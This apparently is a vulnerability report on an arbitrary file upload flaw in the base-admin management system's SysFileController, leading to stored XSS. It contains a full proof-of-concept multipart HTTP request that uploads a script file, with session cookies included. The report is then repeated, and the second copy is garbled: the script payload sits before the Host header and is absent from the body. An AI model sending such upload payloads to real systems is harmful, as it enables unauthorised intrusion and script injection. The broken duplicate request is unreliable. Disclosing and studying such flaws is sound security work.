Vulnerability Description
The base-admin management system contains an arbitrary file upload vulnerability. Attackers can upload any file type. Although the target environment does not support JSP parsing, it can still upload HTML files, potentially leading to a stored XSS attack.
Vulnerability Analysis
1、The program does not validate the file extension of user-uploaded files.(SysFileController.java)
2、Simply concatenate the filename and file extension and save.
Vulnerability Reproduction
1、Send the following request packet
2、Accessing the corresponding URL successfully triggered an XSS attack.
POST /baseadmin/sys/sysFile/upload HTTP/1.1
Host: 10.23.200.67:8888
Content-Length: 206
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.23.200.67:8888/
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylzFJY9ml6Bzi2DVo
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=857CA252B9A86ECC7D5D73A6801404F4; remember-me=WTI0MlM4bFJmRnVjZnp5RXJ4cVVlUSUzRCUzRDolMkZGZCUyQmtuM3ZuJTJGZXUlMkZaWnU2ajBRdlElM0QlM0Q
Connection: keep-alive
------WebKitFormBoundarylzFJY9ml6Bzi2DVo
Content-Disposition: form-data; name="file"; filename="123.jsp"
Content-Type: image/jpeg
<script>alert(1)</script>
------WebKitFormBoundarylzFJY9ml6Bzi2DVo--
Vulnerability Description
The base-admin management system contains an arbitrary file upload vulnerability. Attackers can upload any file type. Although the target environment does not support JSP parsing, it can still upload HTML files, potentially leading to a stored XSS attack.
Vulnerability Analysis
1、The program does not validate the file extension of user-uploaded files.(SysFileController.java)
2、Simply concatenate the filename and file extension and save.
Vulnerability Reproduction
1、Send the following request packet
2、Accessing the corresponding URL successfully triggered an XSS attack.
POST /baseadmin/sys/sysFile/upload HTTP/1.1
<script>alert(1)</script>Host: 10.23.200.67:8888
Content-Length: 206
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.23.200.67:8888/
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylzFJY9ml6Bzi2DVo
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=857CA252B9A86ECC7D5D73A6801404F4; remember-me=WTI0MlM4bFJmRnVjZnp5RXJ4cVVlUSUzRCUzRDolMkZGZCUyQmtuM3ZuJTJGZXUlMkZaWnU2ajBRdlElM0QlM0Q
Connection: keep-alive
------WebKitFormBoundarylzFJY9ml6Bzi2DVo
Content-Disposition: form-data; name="file"; filename="123.jsp"
Content-Type: image/jpeg
------WebKitFormBoundarylzFJY9ml6Bzi2DVo--